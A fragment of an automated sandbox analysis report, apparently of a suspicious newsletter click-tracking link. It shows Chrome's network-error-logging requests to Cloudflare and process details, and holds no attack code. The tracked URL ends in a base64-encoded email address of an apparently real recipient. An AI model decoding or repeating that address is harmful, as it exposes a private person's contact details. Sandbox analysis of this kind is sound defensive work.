                                                        2024-07-03 19:07:49 UTC538OUTOPTIONS /report/v4?s=wkAmjOUGRbvL6MCev0sPu%2FTqpkU3bIJZuCXTCtKqlD5KCE%2F9SkifA4RX1GTYyqLzBZe1eWPtpN5RS5muGDTXphX%2F1bnrJhfKBypszqo8Pa%2BWQRNaZMEIK5oCa9tGcnNUCs4%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://ysh.logentr.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:49 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: POST, OPTIONS
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-type, content-length
                                                        date: Wed, 03 Jul 2024 19:07:49 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        103192.168.2.54984135.190.80.14433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:49 UTC486OUTPOST /report/v4?s=fJLqGBSa3FkswmLN9bCexSRo%2FOCeeyUYPrtX20YljbJIejETBET5PKRKjJ17QWr%2BwEH2zHT3SgVm%2F%2F6z%2FYA3HJoaL8b6Hd59RRiuB%2BB1aNQl5EAEER7Y%2FPKe1F%2Bgdw%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 872
                                                        Content-Type: application/reports+json
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:49 UTC872OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 34 33 31 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 30 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 39 2e 31 34 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 66 77 61 69 2e 65 6c 69 78 69
                                                        Data Ascii: [{"age":24310,"body":{"elapsed_time":1309,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.89.143","status_code":404,"type":"http.error"},"type":"network-error","url":"https://rfwai.elixi
                                                        2024-07-03 19:07:50 UTC168INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        date: Wed, 03 Jul 2024 19:07:49 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        104192.168.2.54984235.190.80.14433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:50 UTC480OUTPOST /report/v4?s=wkAmjOUGRbvL6MCev0sPu%2FTqpkU3bIJZuCXTCtKqlD5KCE%2F9SkifA4RX1GTYyqLzBZe1eWPtpN5RS5muGDTXphX%2F1bnrJhfKBypszqo8Pa%2BWQRNaZMEIK5oCa9tGcnNUCs4%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 486
                                                        Content-Type: application/reports+json
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:50 UTC486OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 30 31 30 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 39 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 79 73 68 2e 6c 6f 67 65 6e 74 72 2e 63
                                                        Data Ascii: [{"age":20100,"body":{"elapsed_time":797,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":404,"type":"http.error"},"type":"network-error","url":"https://ysh.logentr.c
                                                        2024-07-03 19:07:50 UTC168INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        date: Wed, 03 Jul 2024 19:07:49 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:15:06:26
                                                        Start date:03/07/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                        Imagebase:0x7ff715980000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:3
                                                        Start time:15:06:33
                                                        Start date:03/07/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2520,i,3270245400796582298,11625835967902947532,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                        Imagebase:0x7ff715980000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:4
                                                        Start time:15:06:36
                                                        Start date:03/07/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ=="
                                                        Imagebase:0x7ff715980000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        No disassembly